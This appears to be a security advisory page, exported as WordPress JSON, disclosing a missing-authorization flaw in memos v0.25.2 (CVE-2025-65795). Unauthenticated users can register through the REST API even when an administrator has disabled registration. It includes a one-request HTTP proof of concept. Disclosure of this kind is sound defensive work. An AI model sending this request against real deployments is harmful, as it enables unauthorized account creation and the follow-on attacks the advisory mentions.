{"id":24624,"date":"2025-12-05T12:51:07","date_gmt":"2025-12-05T11:51:07","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=24624"},"modified":"2025-12-10T14:46:11","modified_gmt":"2025-12-10T13:46:11","slug":"usd-2025-0058","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0058\/","title":{"rendered":"usd-2025-0058"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n

usd-2025-58 | Broken Access Control in User Registration<\/h1>\n

<\/h1>\n

Product<\/strong>: memos
Affected Version<\/strong>: v0.25.2
Vulnerability Type<\/strong>: CWE-862: Missing Authorization
Security Risk<\/strong>: Medium
Vendor<\/strong>: usememos
Vendor URL<\/strong>: https:\/\/github.com\/usememos\/memos<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2025-65795
CVE Link<\/strong>: https:\/\/www.cve.org\/CVERecord?id=CVE-2025-65795<\/a>
Advisory ID<\/strong>: usd-2025-58<\/p>\n

Description<\/h3>\n

Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth\/SSO integration, activity logging, and internationalization.<\/p>\n

Administrative users can disable public user registration. However, unauthenticated users can still be created by direct calls to the REST API.<\/p>\n

Proof of Concept<\/h3>\n

User registrations can be disabled in the application settings, as shown in the following screenshot.<\/p>\n

\"\"<\/p>\n

Nevertheless, an account can be created by the following HTTP request to the REST API.<\/p>\n

\n
<\/span>POST<\/span> \/api\/v1\/users<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> memos:5230<\/span>\nContent-Type<\/span>:<\/span> application\/json<\/span>\nContent-Length<\/span>:<\/span> 42<\/span>\n\n{<\/span>\n    <\/span>\"username\"<\/span>:<\/span>\"Test\"<\/span>,<\/span>\n    <\/span>\"password\"<\/span>:<\/span>\"12345678\"<\/span>\n}<\/span>\n<\/pre>\n<\/div>\n
Note that this enables further attacks that require authentication, such as arbitrary file write or account takeovers as shown in usd-2025-56 and usd-2025-57.<\/p>\n
Fix<\/h3>\n
A fix for the vulnerability has been submitted as pull request<\/a>.<\/p>\n
References<\/h3>\n